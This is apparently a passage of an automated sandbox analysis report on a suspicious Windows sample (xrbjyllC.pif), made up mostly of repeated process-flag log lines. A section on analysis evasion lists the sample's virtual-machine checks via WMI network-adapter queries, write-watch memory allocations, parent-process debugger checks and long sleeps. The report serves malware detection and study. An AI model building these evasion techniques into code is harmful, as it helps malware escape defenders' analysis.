Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 27F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 29C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 29A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 24F10000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 26F50000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 26D70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 206D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 22710000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 22320000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598068	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597946	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596767	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596416	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596304	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596050	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595698	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595585	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595123	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594911	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594789	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594677	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594564	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594439	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594177	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593658	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593506	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593369	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593196	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593011	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592620	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592105	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591918	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591659	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597172
